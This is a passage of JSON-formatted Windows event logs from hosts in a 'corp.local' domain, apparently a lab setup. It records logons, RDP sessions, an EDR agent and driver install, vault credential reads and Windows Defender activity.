Hours:\t\t-\r\n\tDNS Host Name:\t\t-\r\n\tService Principal Names:\t-\r\n\r\nAdditional Information:\r\n\tPrivileges:\t\t-","Category":"Computer Account Management","Opcode":"Info","ComputerAccountChange":"-","TargetUserName":"IT01$","TargetDomainName":"CORP","TargetSid":"S-1-5-21-2569713578-3403938347-3732993993-1131","SubjectUserSid":"S-1-5-7","SubjectUserName":"ANONYMOUS LOGON","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e6","PrivilegeList":"-","SamAccountName":"-","DisplayName":"-","UserPrincipalName":"-","HomeDirectory":"-","HomePath":"-","ScriptPath":"-","ProfilePath":"-","UserWorkstations":"-","PasswordLastSet":"10/1/2021 4:21:34 AM","AccountExpires":"-","PrimaryGroupId":"-","AllowedToDelegateTo":"-","OldUacValue":"-","NewUacValue":"-","UserAccountControl":"-","UserParameters":"-","SidHistory":"-","LogonHours":"-","DnsHostName":"-","ServicePrincipalNames":"-","EventReceivedTime":"2021-10-01T04:21:35.698025+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T12:42:46.620573+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1501,"SourceName":"Microsoft-Windows-GroupPolicy","ProviderGuid":"{AEA1B4FA-97D1-45F2-A64C-4D69FFFD92C9}","Version":0,"TaskValue":0,"OpcodeValue":1,"RecordNumber":82718,"ActivityID":"{E90BEC84-D5B2-416B-8F39-25931089BDD6}","ExecutionProcessID":1976,"ExecutionThreadID":6920,"Channel":"System","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"The Group Policy settings for the user were processed successfully. There were no changes detected since the last successful processing of Group Policy.","Opcode":"Start","SupportInfo1":"1","SupportInfo2":"4292","ProcessingMode":"0","ProcessingTimeInMilliseconds":"1719","DCName":"\\\\DC01.corp.local","EventReceivedTime":"2021-09-29T12:42:47.441525+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T09:47:45.252964+05:45","Hostname":"IT02.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":5381,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13824,"OpcodeValue":0,"RecordNumber":18988216,"ExecutionProcessID":724,"ExecutionThreadID":7932,"Channel":"Security","Message":"Vault credentials were read.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2569713578-3403938347-3732993993-1139\r\n\tAccount Name:\t\tLeo\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x28632A42\r\n\r\nThis event occurs when a user enumerates stored vault credentials.","Category":"User Account Management","Opcode":"Info","SubjectUserSid":"S-1-5-21-2569713578-3403938347-3732993993-1139","SubjectUserName":"Leo","SubjectDomainName":"CORP","SubjectLogonId":"0x28632a42","Flags":"0","CountOfCredentialsReturned":"0","ProcessCreationTime":"2021-09-29T04:02:36.8912132Z","ClientProcessId":"3100","EventReceivedTime":"2021-09-29T09:47:47.138027+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T11:28:23.891245+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1013,"SourceName":"Microsoft-Windows-Windows Defender","ProviderGuid":"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":22626,"ExecutionProcessID":2080,"ExecutionThreadID":4924,"Channel":"Microsoft-Windows-Windows Defender/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Microsoft Defender Antivirus has removed history of malware and other potentially unwanted software.\r\n \tTime: 9/14/2021 11:28:23 AM\r\n \tUser: NT AUTHORITY\\SYSTEM\r\n","Opcode":"Info","Product Name":"Microsoft Defender Antivirus","Product Version":"4.18.2108.7","Timestamp":"9/14/2021 11:28:23 AM","User":"SYSTEM","SID":"S-1-5-18","EventReceivedTime":"2021-09-29T11:28:25.013013+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T12:37:18.642065+05:45","Hostname":"IT02.corp.local","Keywords":"9259400833873739776","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7045,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":82712,"ExecutionProcessID":704,"ExecutionThreadID":3336,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"A service was installed in the system.\r\n\r\nService Name:  EDR Agent activity monitor\r\nService File Name:  C:\\Windows\\system32\\drivers\\edrdrv.sys\r\nService Type:  kernel mode driver\r\nService Start Type:  disabled\r\nService Account:  ","ServiceName":"EDR Agent activity monitor","ImagePath":"C:\\Windows\\system32\\drivers\\edrdrv.sys","ServiceType":"kernel mode driver","StartType":"disabled","EventReceivedTime":"2021-09-29T12:37:20.224893+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T12:37:18.645270+05:45","Hostname":"IT02.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4697,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":1,"TaskValue":12289,"OpcodeValue":0,"RecordNumber":18988812,"ActivityID":"{7870D080-A924-0001-B9D0-707824A9D701}","ExecutionProcessID":724,"ExecutionThreadID":8476,"Channel":"Security","Message":"A service was installed in the system.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tIT02$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nService Information:\r\n\tService Name: \t\tedrdrv\r\n\tService File Name:\tC:\\Windows\\system32\\drivers\\edrdrv.sys\r\n\tService Type: \t\t0x2\r\n\tService Start Type:\t4\r\n\tService Account: \t\tLocalSystem","Category":"Security System Extension","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"IT02$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","ServiceName":"edrdrv","ServiceFileName":"C:\\Windows\\system32\\drivers\\edrdrv.sys","ServiceType":"0x2","ServiceStartType":"4","ServiceAccount":"LocalSystem","ClientProcessStartKey":"15762598695915713","ClientProcessId":"8420","ParentProcessId":"1876","EventReceivedTime":"2021-09-29T12:37:20.224893+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T19:56:38.821567+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"VERBOSE","SeverityValue":1,"Severity":"DEBUG","EventID":306,"SourceName":"Microsoft-Windows-Bits-Client","ProviderGuid":"{EF1CC15B-46C1-414E-BB95-E76B077BD51E}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":4540,"ExecutionProcessID":356,"ExecutionThreadID":1344,"Channel":"Microsoft-Windows-Bits-Client/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"The BITS service loaded the job list from disk.","Opcode":"Info","EventReceivedTime":"2021-09-29T19:56:40.652026+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T12:33:34.168267+05:45","Hostname":"IT02.corp.local","Keywords":"1152921504606846976","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":261,"SourceName":"Microsoft-Windows-TerminalServices-RemoteConnectionManager","ProviderGuid":"{C76BAA63-AE81-421C-B425-340B4B24157F}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":2152,"ActivityID":"{F420310A-949A-4CA3-9D0B-B777C69E0000}","ExecutionProcessID":788,"ExecutionThreadID":1488,"Channel":"Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"Listener RDP-Tcp received a connection","Opcode":"Info","EventXML.listenerName":"RDP-Tcp","EventReceivedTime":"2021-09-29T12:33:35.801222+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T12:33:36.866523+05:45","Hostname":"DC01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4776,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":14336,"OpcodeValue":0,"RecordNumber":190831589,"ExecutionProcessID":512,"ExecutionThreadID":2544,"Channel":"Security","Message":"The computer attempted to validate the credentials for an account.\r\n\r\nAuthentication Package:\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\r\nLogon Account:\tLeo\r\nSource Workstation:\t192.168.2.54\r\nError Code:\t0x0","Category":"Credential Validation","Opcode":"Info","PackageName":"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0","TargetUserName":"Leo","Workstation":"192.168.2.54","Status":"0x0","EventReceivedTime":"2021-09-29T12:33:38.569653+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T12:33:36.373298+05:45","Hostname":"IT02.corp.local","Keywords":"1152921504606846976","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1149,"SourceName":"Microsoft-Windows-TerminalServices-RemoteConnectionManager","ProviderGuid":"{C76BAA63-AE81-421C-B425-340B4B24157F}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":2153,"ActivityID":"{F420310A-949A-4CA3-9D0B-B777C69E0000}","ExecutionProcessID":788,"ExecutionThreadID":8068,"Channel":"Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"Remote Desktop Services: User authentication succeeded:\r\n\r\nUser: Leo\r\nDomain: CORP\r\nSource Network Address: 172.16.20.11","Opcode":"Info","EventXML.Param1":"Leo","EventXML.Param2":"CORP","EventXML.Param3":"172.16.20.11","EventReceivedTime":"2021-09-29T12:33:37.880293+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T12:33:36.940494+05:45","Hostname":"IT02.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4778,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12551,"OpcodeValue":0,"RecordNumber":18988672,"ActivityID":"{7870D080-A924-0001-B9D0-707824A9D701}","ExecutionProcessID":724,"ExecutionThreadID":8476,"Channel":"Security","Message":"A session was reconnected to a Window Station.\r\n\r\nSubject:\r\n\tAccount Name:\t\tLeo\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x28632A42\r\n\r\nSession:\r\n\tSession Name:\t\tRDP-Tcp#15\r\n\r\nAdditional Information:\r\n\tClient Name:\t\tHOME-PC\r\n\tClient Address:\t\t172.16.20.11\r\n\r\nThis event is generated when a user reconnects to an existing Terminal Services session, or when a user switches to an existing desktop using Fast User Switching.","Category":"Other Logon/Logoff Events","Opcode":"Info","AccountName":"Leo","AccountDomain":"CORP","LogonID":"0x28632a42","SessionName":"RDP-Tcp#15","ClientName":"HOME-PC","ClientAddress":"172.16.20.11","EventReceivedTime":"2021-09-29T12:33:37.895969+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T14:19:45.296643+05:45","Hostname":"IT02.corp.local","Keywords":"1152921504606846976","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":40,"SourceName":"Microsoft-Windows-TerminalServices-LocalSessionManager","ProviderGuid":"{5D896912-022D-40AA-A3A8-4FA5515C76D7}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":3976,"ActivityID":"{F420310A-949A-4CA3-9D0B-B777C69E0000}","ExecutionProcessID":1020,"ExecutionThreadID":9480,"Channel":"Microsoft-Windows-TerminalServices-LocalSessionManager/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Session 7 has been disconnected, reason code 12","Opcode":"Info","EventXML.Session":"7","EventXML.Reason":"12","EventReceivedTime":"2021-09-29T14:19:46.787389+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T12:33:37.510690+05:45","Hostname":"IT02.corp.local","Keywords":"1152921504606846976","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":25,"SourceName":"Microsoft-Windows-TerminalServices-LocalSessionManager","ProviderGuid":"{5D896912-022D-40AA-A3A8-4FA5515C76D7}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":3974,"ActivityID":"{F420310A-949A-4CA3-9D0B-B777C69E0000}","ExecutionProcessID":1020,"ExecutionThreadID":4136,"Channel":"Microsoft-Windows-TerminalServices-LocalSessionManager/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Remote Desktop Services: Session reconnection succeeded:\r\n\r\nUser: CORP\\Leo\r\nSession ID: 7\r\nSource Network Address: 172.16.20.11","Opcode":"Info","EventXML.User":"CORP\\Leo","EventXML.SessionID":"7","EventXML.Address":"172.16.20.11","EventReceivedTime":"2021-09-29T12:33:38.999043+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T13:33:55.432626+05:45","Hostname":"IT02.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4611,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12289,"OpcodeValue":0,"RecordNumber":18989195,"ActivityID":"{7870D080-A924-0001-B9D0-707824A9D701}","ExecutionProcessID":724,"ExecutionThreadID":10092,"Channel":"Security","Message":"A trusted logon process has been registered with the Local Security Authority.\r\nThis logon process will be trusted to submit logon requests.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tIT02$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nLogon Process Name:\t\tConsentUI","Category":"Security System Extension","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"IT02$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","LogonProcessName":"ConsentUI","EventReceivedTime":"2021-09-29T13:33:56.960150+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T12:33:39.521508+05:45","Hostname":"IT02.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4801,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12551,"OpcodeValue":0,"RecordNumber":18988718,"ActivityID":"{7870D080-A924-0001-B9D0-707824A9D701}","ExecutionProcessID":724,"ExecutionThreadID":3660,"Channel":"Security","Message":"The workstation was unlocked.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2569713578-3403938347-3732993993-1139\r\n\tAccount Name:\t\tLeo\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x28632A42\r\n\tSession ID:\t7","Category":"Other Logon/Logoff Events","Opcode":"Info","TargetUserSid":"S-1-5-21-2569713578-3403938347-3732993993-1139","TargetUserName":"Leo","TargetDomainName":"CORP","TargetLogonId":"0x28632a42","SessionId":"7","EventReceivedTime":"2021-09-29T12:33:41.494415+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T13:33:18.332524+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1040,"SourceName":"MsiInstaller","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":69837,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"Beginning a Windows Installer transaction: {45CC556C-A03B-42FF-A2FE-000000000000}. Client Process Id: 7408.","Opcode":"Info","Data":"{45CC556C-A03B-42FF-A2FE-000000000000}","Data_1":"7408","Data_2":"(NULL)","Data_3":"(NULL)","Data_4":"(NULL)","Data_5":"(NULL)","EventReceivedTime":"2021-09-29T13:33:19.589725+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T12:37:50.727611+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":2010,"SourceName":"Microsoft-Windows-Windows Defender","ProviderGuid":"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":22632,"ExecutionProcessID":2080,"ExecutionThreadID":3424,"Channel":"Microsoft-Windows-Windows Defender/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Microsoft Defender Antivirus used Dynamic security intelligence Service to retrieve additional security intelligence to help protect your machine.\r\n \tCurrent security intelligence Version: 1.349.1604.0\r\n \tSecurity intelligence Type: AntiVirus\r\n \tUser: \\\r\n \tCurrent Engine Version: 1.1.18500.10\r\n \tDynamic security intelligence Type: Security intelligence update\r\n \tPersistence Path: C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\RtSigs\\data\\e5c7d6a054295bc4ed605418a7c26baf4a8cbaa6\r\n \tDynamic security intelligence Version: 0.0.0.0\r\n \tDynamic security intelligence Compilation Timestamp: 9/29/2021 6:52:46 AM\r\n \tPersistence Limit Type: Duration\r\n \tPersistence Limit: 288000000","Opcode":"Info","Product Name":"Microsoft Defender Antivirus","Product Version":"4.18.2108.7","Current security intelligence Version":"1.349.1604.0","Security intelligence Type Index":"1","Security intelligence Type":"AntiVirus","Current Engine Version":"1.1.18500.10","Dynamic security intelligence Type Index":"1","Dynamic security intelligence Type":"Security intelligence update","Persistence Path":"C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\RtSigs\\data\\e5c7d6a054295bc4ed605418a7c26baf4a8cbaa6","Dynamic security intelligence Version":"0.0.0.0","Dynamic security intelligence Compilation Timestamp":"9/29/2021 6:52:46 AM","Persistence Limit Type Index":"2","Persistence Limit Type":"Duration","Persistence Limit Value":"288000000","EventReceivedTime":"2021-09-29T12:37:52.111118+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T12:37:20.678016+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":6,"SourceName":"Microsoft-Windows-FilterManager","ProviderGuid":"{F3C5E28E-63F6-49C7-A204-E48A1BC4B09D}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":82715,"ExecutionProcessID":4,"ExecutionThreadID":5692,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File System Filter 'edrdrv' (10.0, ???2020???-???11???-???06T04:46:51.000000000Z) has successfully loaded and registered with Filter Manager.","Opcode":"Info","FinalStatus":"0x0","DeviceVersionMajor":"10","DeviceVersionMinor":"0","DeviceNameLength":"6","DeviceName":"edrdrv","DeviceTime":"2020-11-06T04:46:51.0000000Z","EventReceivedTime":"2021-09-29T12:37:22.448054+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T13:34:30.512393+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1042,"SourceName":"MsiInstaller","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":69840,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Ending a Windows Installer transaction: {45CC556C-A03B-42FF-A2FE-000000000000}. Client Process Id: 7408.","Opcode":"Info","Data":"{45CC556C-A03B-42FF-A2FE-000000000000}","Data_1":"7408","Data_2":"(NULL)","Data_3":"(NULL)","Data_4":"(NULL)","Data_5":"(NULL)","EventReceivedTime":"2021-09-29T13:34:52.764572+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T12:37:25.971758+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1033,"SourceName":"MsiInstaller","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":69823,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"Windows Installer installed the product. Product Name: EDR Agent v2. Product Version: 2.0.0.0. Product Language: 1033. Manufacturer: OpenEdr. Installation success or error status: 0.","Opcode":"Info","Data":"EDR Agent v2","Data_1":"2.0.0.0","Data_2":"1033","Data_3":"0","Data_4":"OpenEdr","Data_5":"(NULL)","EventData.Binary":"7B34354343353536432D413033422D343246462D413246452D3030303030303030303030307D3030303039323065343765663532383433393263373132393635616534306161626430633030303030393034","EventReceivedTime":"2021-09-29T12:37:27.037211+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T12:37:25.956078+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11707,"SourceName":"MsiInstaller","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":69822,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"Product: EDR Agent v2 -- Installation completed successfully.","Opcode":"Info","Data":"Product: EDR Agent v2 -- Installation completed successfully.","Data_1":"(NULL)","Data_2":"(NULL)","Data_3":"(NULL)","Data_4":"(NULL)","Data_5":"(NULL)","EventData.Binary":"7B34354343353536432D413033422D343246462D413246452D3030303030303030303030307D","EventReceivedTime":"2021-09-29T12:37:27.034272+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T12:37:50.046238+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":12,"SourceName":"Microsoft-Windows-Security-Mitigations","ProviderGuid":"{FAE10392-F0AF-4AC0-B8FF-9F4D920C3CDF}","Version":0,"TaskValue":6,"OpcodeValue":0,"RecordNumber":1155,"ExecutionProcessID":856,"ExecutionThreadID":2944,"Channel":"Microsoft-Windows-Security-Mitigations/KernelMode","Domain":"Font Driver Host","AccountName":"UMFD-1","UserID":"S-1-5-96-0-1","AccountType":"Well Known Group","Message":"Process '\\Device\\HarddiskVolume2\\Windows\\System32\\fontdrvhost.exe' (PID 856) was blocked from loading the non-Microsoft-signed binary '\\Windows\\System32\\edrpm64.dll'.","Opcode":"Info","ProcessPathLength":"56","ProcessPath":"\\Device\\HarddiskVolume2\\Windows\\System32\\fontdrvhost.exe","ProcessCommandLineLength":"17","ProcessCommandLine":"\"fontdrvhost.exe\"","ProcessId":"856","ProcessCreateTime":"2021-09-14T04:54:13.7524072Z","ProcessStartKey":"15762598695796750","ProcessSignatureLevel":"8","ProcessSectionSignatureLevel":"8","ProcessProtection":"0","TargetThreadId":"2944","TargetThreadCreateTime":"2021-09-29T06:52:49.2088748Z","RequiredSignatureLevel":"8","SignatureLevel":"0","ImageNameLength":"29","ImageName":"\\Windows\\System32\\edrpm64.dll","EventReceivedTime":"2021-09-29T12:37:52.095409+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T12:39:45.238247+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":2,"SourceName":"Microsoft-Windows-Security-Mitigations","ProviderGuid":"{FAE10392-F0AF-4AC0-B8FF-9F4D920C3CDF}","Version":0,"TaskValue":1,"OpcodeValue":0,"RecordNumber":1156,"ExecutionProcessID":704,"ExecutionThreadID":5828,"Channel":"Microsoft-Windows-Security-Mitigations/KernelMode","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process '\\Device\\HarddiskVolume2\\Windows\\System32\\services.exe' (PID 704) was blocked from generating dynamic code.","Opcode":"Info","ProcessPathLength":"53","ProcessPath":"\\Device\\HarddiskVolume2\\Windows\\System32\\services.exe","ProcessCommandLineLength":"6","ProcessCommandLine":"(null)","CallingProcessId":"704","CallingProcessCreateTime":"2021-09-14T04:54:12.8015502Z","CallingProcessStartKey":"15762598695796747","CallingProcessSignatureLevel":"62","CallingProcessSectionSignatureLevel":"12","CallingProcessProtection":"97","CallingThreadId":"5828","CallingThreadCreateTime":"2021-09-29T06:52:50.9589500Z","EventReceivedTime":"2021-09-29T12:39:47.715025+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T12:57:21.975531+05:45","Hostname":"IT02.corp.local","Keywords":"9259400833873739776","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":10016,"SourceName":"Microsoft-Windows-DistributedCOM","ProviderGuid":"{1B562E86-B7AA-4131-BADC-B6F3A001407E}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":82729,"ActivityID":"{AEE21D71-D679-425B-BE22-ED0DE9FAF8DD}","ExecutionProcessID":972,"ExecutionThreadID":3884,"Channel":"System","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"The machine-default permission settings do not grant Local Activation permission for the COM Server application with CLSID \r\n{C2F03A33-21F5-47FA-B4BB-156362A2F239}\r\n and APPID \r\n{316CDED5-E4AE-4B15-9113-7055D84DCC97}\r\n to the user CORP\\Leo SID (S-1-5-21-2569713578-3403938347-3732993993-1139) from address LocalHost (Using LRPC) running in the application container Microsoft.Windows.ShellExperienceHost_10.0.19041.610_neutral_neutral_cw5n1h2txyewy SID (S-1-15-2-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708). This security permission can be modified using the Component Services administrative tool.","Opcode":"Info","param1":"machine-default","param2":"Local","param3":"Activation","param4":"{C2F03A33-21F5-47FA-B4BB-156362A2F239}","param5":"{316CDED5-E4AE-4B15-9113-7055D84DCC97}","param6":"CORP","param7":"Leo","param8":"S-1-5-21-2569713578-3403938347-3732993993-1139","param9":"LocalHost (Using LRPC)","param10":"Microsoft.Windows.ShellExperienceHost_10.0.19041.610_neutral_neutral_cw5n1h2txyewy","param11":"S-1-15-2-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708","EventReceivedTime":"2021-09-29T12:57:23.299959+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-29T12:40:34.674701+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":2050,"SourceName":"Microsoft-Windows-Windows Defender","ProviderGuid":"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":22636,"ExecutionProcessID":2080,"ExecutionThreadID":9532,"Channel":"Microsoft-Windows-Windows Defender/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Microsoft Defender Antivirus has uploaded a file for further analysis.\r\n \tFilename: C:\\Users\\Leo\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt\r\n \tSha256: 76df4d5a685b0e4dc11a06d71e0e8f8677e1724ced7c1c739a0934bd28315565\r\n","Opcode":"Info","Product Name":"Microsoft Defender Antivirus","Product Version":"4.18.2108.7","Filename":"C:\\Users\\Leo\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt","Sha256":"76df4d5a685b0e4dc11a06d71e0e8f8677e1724ced7c1c739a0934bd28315565","EventReceivedTime":"2021-09-29T12:40:36.358091+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
